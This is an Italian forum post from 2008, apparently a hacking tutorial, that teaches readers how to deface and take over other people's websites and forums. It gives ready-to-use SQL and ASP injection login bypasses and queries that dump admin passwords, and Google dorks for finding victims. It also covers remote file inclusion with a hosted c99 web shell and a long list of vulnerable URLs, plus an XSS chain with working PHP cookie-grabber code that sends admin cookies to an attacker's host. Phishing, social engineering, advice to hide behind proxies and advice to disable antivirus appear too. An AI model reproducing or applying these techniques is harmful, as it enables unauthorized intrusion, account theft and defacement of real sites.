Defacciare

« Older   Newer »
  Share  
.Luke
view post Posted on 13/6/2008, 11:07




PREMESSA: Se fate copia/incolla su questa guida, pregasi inserire l'autore (io) al fondo. :)
L'autore di questo tutorial non si assumerà nessuna responsabilità dell'uso improprio delle informazioni sottostanti. Quindi non andate a inserire una dork qualsiasi su google, provare una delle tecniche che imparerete ora e defacciare. Se no basteranno solamente 5 lettere per definirvi: L-A-M-E-R ;)
Ah, quasi dimenticavo, se avete davanti a voi il pannello di amministrazione del sito vittima non ownatelo completamente bensì mettete AL MASSIMO un alert o semplicemente inviate un MP all'admin dicendo che è vulnerabile.

Incominciamo iniziando dalla tecnica più basilare fino ad arrivare a quella "suprema" XD
Ricordo: SEMPRE proxaty!! ;)

- PRIMA TECNICA

Social Engineering: Si sarà una tecnica semplice da apprendere ma ci vuole anche certa classe per convincere il Founder a farvi membro dello staff nel foro. Non c'è molta da sapere, soltanto bisogna essere furbi e svegli.

Esempio:

IO: ciao founder ho visto il tuo forum. devo dire che è molto bello però la skin non è che sia il massimo. io sono un grafico e te la potrei cambiare con una migliore.

VITTIMA FOUNDER: Mi devo fidare? Posta tanto sul forum e ti faremo staff....

..Dopo che abbiamo postato molto ritorniamo da lui.

IO: Ho fatto come hai chiesto ;)

VITTIMA FOUNDER: Perfetto sei admin grafico, cambiami questa schifo di skin.

Semplice, no?

- SECONDA TECNICA

SQL INJECTION: La SQL injection è una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL (Wikipedia)
Quindi, presentiamoci davanti al login dell'admin e scriviamo:

Username: ‘or’’=’
Password: ‘or’’=’

Questo è solo un esempio, ci sono molte altre query simile. Se non funziona in questo modo attacchiamo il sito dall barra degli indirizzi:
www.sitovittima.it/cgi-bin/php.cgi?/etc/passwd. Se tutto è andato a buon fine ci ritroveremo le password degli admin criptate in MD5.
Potete usare anche www.sitovittima.it/~dumbuser/cool-logs/mlog.html?screen=etc/passwd oppure www.sitovittima.it/~dumbuser/cool-logs/mylog.html?screen=etc/passwd.

Potremo anche utilizzare degli exploit che contengono una stringa SQL Injection nel Form del Search. Scriviamo nel modulo cerca questa stringa:

p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* e avremo le pwd in md5.

E' anche abbastanza famoso il bug che avvolge il modulo Top10:

www.sitovittima.it/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors.

Search, Top10 e ora barra degli indirizzi. http://sito_vittima/admin.php?foo=bar&admin=eCcgT1IvKjp5. Se vedremo come risultato "Selection from the databse failed!" siamo dentro… L'unica cosa che ci resta da fare è creare un user con privilegi da admin.

http://sito_vittima/admin.php?op=AddAuthor...0VMRUNUIDEvKjox. Premendo invio avremo creato un nuovo account con poteri illimitati.

- TERZA TECNICA

ASP INJECTION: Simile alle SQL Injection solo che useremo questa tecnica quando ci ritroveremo di fronte a siti costruti in piattaforma .asp
Davanti al login utente scriviamo le seguenti query:

Utente senza registrazione
- UserName:’ ----------> apostrofo snz spazio…
- Password: ----------> nessuna password, lasciate vuoto…

Scoprire la password dell’amministratore
UserName: ' union select Password,1,1,1 from members where UserID = 'admin'-
Password: ----------> nessuna password…

Diventare automaticamente amministratori…
UserName: admin' -
Password ---------> nessuna pass

Diventare il primo utente nella lista degli utenti!!!
UserName: ' or 0=0 --sp_password
Password: --------> nessuna pass anche stavolta!

QUARTA TECNICA

GuestBook: Un altro modo per defacciare può essere tramite il guestbook di un sito/forum.
Il Guestbook è un'utilità interattiva che permette ai visitatori di un sito web di poter lasciare firme e commenti. ;)
Scriviamo questa query nella text box del motore di ricerca + famoso al mondo, Google:
CODICE
inurl:”guestbook/admin/login.php”


Cercate un po' tra i vari siti/forum che si aprono tutti sulla pagina del login..
Una volta trovato quello interessato nel campo dell'Username inseriamo:
CODICE
'or 'jr7'='jr7' /*


...mentre nel campo dell Password ne mettiamo una a nostra piacere...

Se il sito è vulnerabile siamo padroni del sito/forum! ;)

NO LAMERATE!

- QUINTA TECNICA

MKPortal + vBulletin 3.5.4: Scrivete questa stringa su google "Powered by mkportal vbulletin 3.5.4" senz'apici e trovate un sito vulnerabile (rarissimi)....
Una volta trovato inserite questo codice all'url "ind=',userid='1" senz'apici così il risultato sarà:

CODICE
www.sitovittima.it/index.php?ind=',userid='1

Se tutti è andato a buon fine siete admin del sito..
Se "refresshate" (nuovo mio termine *LOL*) la pagina ritornate un utente qualsiasi..

- SESTA TECNICA

Cookie Manipulation: Con questa tecnica ci concentreremo sui forum PhpBB e PhpBB2. Esiste un exploit "semplice" che ci permette di diventare root in forum. Ah, per compiere questa tecnica è meglio se avete come browser Mozilla Firefox ;)
Cercate su Google "Powered By phpBB 1.0.12."
Trovate un sito vulnerabile e state fermi nella homepage dle forum..

Vai su C:/Documents and Settings/Vostro computer/Dati e applicazioni/Mozilla firefox/"la cartella quella con numeri e lettere" andate su “COOKIE.TXT” e pigiate "CTRL+T". Ora nella ricerca inserirete il sito che dovreste defacciare... quando cerca se trovate "phpbb2mysql_data" vuol dire che il sito è vulnerabile (ma non certamente) individuate il "codice guest" e se spunta "a%3A07B" modificatelo con "a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D" (se troverete già questo codice guest il sito non sarà vulnerabile)

..adesso rientrate nel sito e magicamente DOVRESTE essere amministratori....
Guida da SERIOUS ;)
Io ho un po' modificato questa guida..non si capiva granchè XD

Ricordo che con alcuni questa tecnica può anche fallire..Perchè? perchè molti (tipo me) non hanno la cartella Dati e applicazioni/Mozilla Firefox ;)

SETTIMA TECNICA

Powered by FrontPage: Queste due stringhe, se inserite correttamente nella barra degli indirizzi ci mostreranno le pass degli admin.
www.sitovittima.it/_vti_pvt/administrators.pwd

alternativamente

www.sitovittima.it/_vti_inf.html

OTTAVA TECNICA

JPORTAL: Scrivete su google "Powered by jportal. Vi usciranno una miriade di pagine tra cui ci potrà essere un sito vulnerabile, no? :asd:
Nella barra degli indirizzi, dov'è c'è scritto www.sitovittima.it AGGIUNGEREMO questo codice:

CODICE
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1


Vedete la X? Ecco lì dovete inserire o il numero 1 o il numero 2. Ovviamente dopo premiavo invio. Se il bug non è stato fixato vedremo le pass degli admin NON hashate ;)

NONA TECNICA

Brute force: Metodo D-I-S-P-E-R-A-T-O. E' molto semplice da utilizzare. Consiste nel scaricare un programmino, inserire il link del sito vittima e vedere se riesce a crakkare la password. Praticamente prova tutte le combinazioni fino a trovare la pwd dell'FTP. Per avere più possibilità è necessario allegarci un dizionario così il brute force avrà più parole da "mangiare"

DECIMA TECNICA

REMOTE FILE INCLUDE: Cos'è una shell e come si utilizza.

Una shell è un "ambiente di lavoro" strutturata specialmente in PHP che sfrutta il bug dell'autoiniezione. Da questo viene fuori la tecnica dell'RFI.

Cosa ci dice Wikipedia?

CITAZIONE
In un sistema operativo, la shell è il programma che permette agli utenti di comunicare con il
sistema e di avviare i programmi. È una delle componenti principali di un sistema operativo, insieme al kernel.

La shell è l'"ambiente di lavoro" attraverso il quale è possibile impartire al computer comandi, richiedendo l'esecuzione di programmi.

Ci sono molti tipi di shell che possono essere testuali e grafiche ma questo non c'importa.

Iniziamo. Hostiamo la nostra shell c99 su un free hosting (oppure usate cuteFTP che uploada da pc locale a web) con l'enstensione .php che fungerà da CLIENT. Poi uppate ancora questa shell in formato .txt in un altro dominio web, che fungerà da SERVER.

Ora dobbiamo aggiungere alla variabile buggata del sitovittima l'URL della shellc99.txt

Esempio: http://www.sito.it/index.php?variabilebugg...rcorsoshell.txt
Sempre se il sito è vulnerabile, aggiornate la shell.php e avrete tutti i file che compongono il sito.
Specialmente dovreste trovare il file config.php dove troverete tutti i dati per entrare nel db ;)

LINK C99: QUI
P.S. Disattivate l'antivirus perchè se no ve lo rileva come codice maligno in PHP.

Qua quasi tutti gli exploit:

#http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script] #
#http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #
#http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #
#http://www.site.com/missing.php?header_prog=[Evil_Script] #
#http://www.site.com/_inc/footer.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?mod_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script] #
#http://www.site.com/_mods/email.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?footer_prog=[Evil_Script] #
#http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/search.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/topics.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/users.php?header_prog=[Evil_Script] #
#http://www.site.com/[livehelperpath]/initiate.php?abs_path=[Evil_Script] #
#http://www.site.com/admanagerpro/common.php?ipath=[Evil_Script] #
#http://www.site.com/templates/deluxe/postreply.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/deluxe/posting.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/deluxe/pm/newpm.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/postreply.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/posting.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/pm/newpm.php?templatefolder=[Evil_Script] #
#http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts] #

Dov'è c'è scritto [evil_scripts] dovete inserire il link in cui è hostata la shell c99 ;)

UNDICESIMA TECNICA

Cross Site Scripting:Questa tecnica, chiamata anche XSS, è una vulnerabilità che avvolge websites con scarso controllo di variabili derivate da input dell'utente . In questo modo si può modificare la sorgente di una pagina grabbando i cookie dell'admin. Si inietta codice javascript maligno o nella barra degli indirizzi o nel modulo Search.

<script>alert(/quel che ti pare/)</script> permette di far apparire un semplice alert in javascript con dentro la frase che hai scelto.

<script>(document.cookie)</script> grabba i TUOI cookie ma come fare per grabbare i cookie dell'admin?

Per trovare siti vulnerabili si può usare questa dork: inurl:"index.php/page="
se il sito vittima è www.sitovittima.it/index.php/page= andremo a inserire la nostra xss quindi www.sitovittima.it/index.php/page<script>(document.cookie)</script> vedremo un alert con i nostri cookie e il nostro SID.

Per i cookie dell'admin dobbiamo fare un semplice redirect che appunto redirecta l'admin al nostro cookie grabber.

Redirect:
CODICE
location.href='http://www.link del cookie grabber?cookie='+escape(document.cookie)
e salviamo in sc.js.

Cookie grabber:
CODICE
<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$ref=$_SERVER['HTTP_REFERER'];
$data = date('j/n/y - H:i') ;
$cookielog = "cookielog.html";

// echo $cookie;

$msg="nCookie:$cookie Ip Address: $ip HTTPREF: $ref DATA: $data";

$file = fopen($cookielog, 'a');
$write = fwrite($file, $msg);
$close = fclose($file);

?>
che rinomineremo in log.php, e hosteremo tutto su un nostro spazio web..consiglio altervista :asd:
Ora andiamo a creare il file index.php
CODICE
<?
$sito = "http://www.esempio.com/ricerca?tipo=artista&ricerca=<script>document.location="http://www.link dove è hostato il file sc.js"</script>";
print '
<meta HTTP-EQUIV="Refresh" CONTENT="1; URL='.$sito.'">
';
?>


Se l'admin clicca sul sc.js viene redirectato al cookie grabber..
Ora non ci resta da fare che cambiare i nostri cookie con quelli dell'admin..useremo AN EC Cookie Editor

DODICESIMA TECNICA

Exploit: Vi ricordo che è penoso usare exploit creati da altri. Lo so che è molto difficile crearsene uno tutto nostro ma alla fine si fa più bella figura :rotfl: :rotfl:
Gli exploit generalmente sono "struttarati" in C++, Perl o C.
Ecco come usarli:
Se vogliamo un exploit in perl dobbiamo scaricare l'interprete, in questo caso Active Perl, che potete benissimo trovare su Google ;)
Una volta fatto andate su milw0rm, scegliete un exploit che attacchi la piattaforma desiderata, salvatelo in un blocco note e salvatelo in nomechevuoitu.pl. Infine posizionatelo nella cartella C:Perlbin. Apriamo il prompt dei comandi e ci dovremo spostare nella cartella in cui risiede l'exploit. Lo lanciamo e ci saranno tutte le info dell'exploit e come usarlo. Da qui è semplice utilizzarlo.

TECNICHE SECONDARIE

L'attacker potrebbe usare anche un fake login per entrare nella posta elettronica della vittima, fare "Password Dimenticata?" e loggarsi come admin con la nuova pwd. Oppure con una fakeapp. Diciamo alla vittima di inserire i dati con cui è registrato al forum in un programmino. Inventiamo una cazzata qualunque dicendo che il suo forum sarà "più visitato". Social engineering Rulez! :clap:

Possiamo ricordare anche il Mail change, le XST, le CSRF, le RCI ecc..sarebbe troppo lunga se le mettessi tutte ;)
si ringrazia Linus_winodws ;)
 
Top
0 replies since 13/6/2008, 11:07   163 views
  Share